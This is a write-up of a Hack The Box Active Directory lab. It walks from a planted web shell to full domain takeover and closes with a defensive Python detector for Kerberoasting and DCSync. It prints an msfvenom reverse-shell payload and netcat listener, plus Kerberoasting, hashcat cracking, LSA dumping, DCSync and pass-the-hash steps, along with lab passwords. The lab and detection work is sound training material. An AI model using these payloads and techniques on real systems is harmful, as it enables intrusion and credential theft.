AD Enumeration & Attacks - Hack The Box - Skill Assessment 1

This is a write-up of the skills assessment lab for the AD Enumeration & Attacks module from Hack The Box.


Scenario

A team member started an External Penetration Test and was moved to another urgent project before they could finish. The team member was able to find and exploit a file upload vulnerability after performing recon of the externally-facing web server. Before switching projects, our teammate left a password-protected web shell (with the credentials: admin:My_W3bsH3ll_P@ssw0rd!) in place for us to start from in the /uploads directory. As part of this assessment, our client, Inlanefreight, has authorized us to see how far we can take our foothold and is interested to see what types of high-risk issues exist within the AD environment. Leverage the web shell to gain an initial foothold in the internal network. Enumerate the Active Directory environment looking for flaws and misconfigurations to move laterally and ultimately achieve domain compromise.

Apply what you learned in this module to compromise the domain and answer the questions below to complete part I of the skills assessment.

As the content is long, I divided it by the questions that need to be answered in the skills assessment.

Q1 - Submit the contents of the flag.txt file on the administrator Desktop of the web server

After accessing the web shell with the shared credentials, I confirmed system access on the web server and retrieved the flag without any additional technique.

[Image: webshell flag1]

Q2 - Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer

At this point things were getting interesting. I decided to create and upload a reverse shell to the web server to enumerate the host more thoroughly. This can be done in the three steps below:

- generate the payload with msfvenom: msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACK HOST> LPORT=4444 -f exe > Test1.exe

- start a netcat listener on the attack host: nc -vlnp 4444

- upload the payload file to the web server and execute it.


After that, running the query below in a PowerShell terminal returned svc_sql as the account name.

Get-DomainObject -LDAPFilter "(servicePrincipalName=MSSQLSvc/SQL01.inlanefreight.local:1433)" -Properties samaccountname

[Image: SPN - account svc_sql]

Q3 - Crack the account's password. Submit the cleartext value.

As I had a SYSTEM session, I uploaded PowerView to perform the Kerberoasting attack and retrieve a TGS ticket for svc_sql.

Get-DomainUser -Identity svc_sql | Get-DomainSPNTicket -Format Hashcat

[Image: kerberoasting]

After that, I saved the hash to a file and cracked it offline with hashcat, which revealed the password 'lucky7':

hashcat -m 13100 svc_sql_tgs /usr/share/wordlists/rockyou.txt

[Image: password cracking]

Q4 - Submit the contents of the flag.txt file on the Administrator desktop on MS01

Using the svc_sql credentials, I connected straight to MS01 and retrieved the flag.

[Image: flag 4]

Q5 - Find cleartext credentials for another domain user. Submit the username as your answer.

To answer this question and the following ones, I decided to use the web server as a pivot host so that I could run tests directly from the Linux attack host. I set up the tunnel with ligolo-ng; you can find more about this technique in my previous post.

Finally, I used CrackMapExec to dump the LSA secrets from MS01 (by its IP address), which revealed the cleartext credentials of the user tpetty.

[Image: lsa dump MS01]

Q6 - Submit this user's cleartext password

The answer is also visible in the image above: Sup3rS3cur3D0m@inU2eR

Q7 - What attack can this user perform?

To answer the question, I imported PowerView and performed ACL enumeration as shown in the module:

PS C:\> Import-Module .\PowerView.ps1
PS C:\> $sid = Convert-NameToSid tpetty
PS C:\> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}

The output revealed an access control entry (ACE) granting tpetty the DS-Replication-Get-Changes-All right. As described in the module, once an account holding this right is compromised, it can be used to perform a DCSync attack.

[Image: tpetty ACE]


Q8 - Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01

To take over DC01, I first checked which users were members of 'Domain Admins' with the following command:

[Image: domain admin users query]

The output returned only the user Administrator.

After that, abusing tpetty's credentials, I dumped the NT hashes from DC01 via DCSync.

[Image: dcsync abuse]

Finally, I connected to DC01 with the Administrator's hash using the pass-the-hash technique.

[Image: DC01 compromise]

Last but not least, the DC flag:

[Image: DC flag]
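As a defender's counterpart to the Kerberoasting step in Q3 and the DCSync right abused in Q7/Q8, here is an added detection example (my own code, not part of the lab or the original write-up). It assumes Security events have already been parsed into dicts carrying the standard 4769/4662 field names; the sample events, including the host and account names in them, are constructed for this illustration.

```python
# Detection logic for the two techniques chained in this write-up: Kerberoasting
# (Q3) and DCSync (Q7/Q8). Input is pre-parsed Windows Security events as dicts;
# the sample events below are constructed for this example, not exported logs.

# Extended-right GUIDs that appear in the Properties of a 4662 event when a
# principal reads directory changes the way a replicating DC does (DCSync).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
RC4_HMAC = "0x17"  # TicketEncryptionType that Kerberoasting tools request

def is_kerberoast(ev: dict) -> bool:
    """4769 (TGS request) for a user-owned SPN with RC4 encryption."""
    if ev.get("EventID") != 4769 or ev.get("Status") != "0x0":
        return False
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"] == RC4_HMAC
            and not svc.endswith("$")       # machine accounts get AES tickets
            and svc.lower() != "krbtgt")    # every TGT request names krbtgt

def is_dcsync(ev: dict, dc_accounts: set) -> bool:
    """4662 carrying a replication GUID, requested by something other than a DC."""
    if ev.get("EventID") != 4662:
        return False
    granted = {g.lower() for g in ev.get("Properties", [])}
    return bool(granted & REPLICATION_GUIDS) and ev["SubjectUserName"] not in dc_accounts

def triage(events: list, dc_accounts: set) -> list:
    """Return (technique, account) pairs in the order the events were seen."""
    hits = []
    for ev in events:
        if is_kerberoast(ev):
            hits.append(("kerberoast", ev["ServiceName"]))
        elif is_dcsync(ev, dc_accounts):
            hits.append(("dcsync", ev["SubjectUserName"]))
    return hits

# Constructed sample: names mirror the lab, field layout mirrors 4769/4662, but the
# Properties list is simplified to bare GUIDs and nothing here came from a real DC.
SAMPLE_EVENTS = [
    {"EventID": 4769, "Status": "0x0", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "Status": "0x0", "ServiceName": "SQL01$", "TicketEncryptionType": "0x12"},
    {"EventID": 4769, "Status": "0x0", "ServiceName": "krbtgt", "TicketEncryptionType": "0x17"},
    {"EventID": 4662, "SubjectUserName": "tpetty", "Properties": ["1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"EventID": 4662, "SubjectUserName": "DC01$", "Properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"]},
]
```

Running triage(SAMPLE_EVENTS, {"DC01$"}) flags the RC4 ticket request for svc_sql and the replication read by tpetty, while the AES request for SQL01$, the krbtgt TGT request and the DC's own replication are ignored.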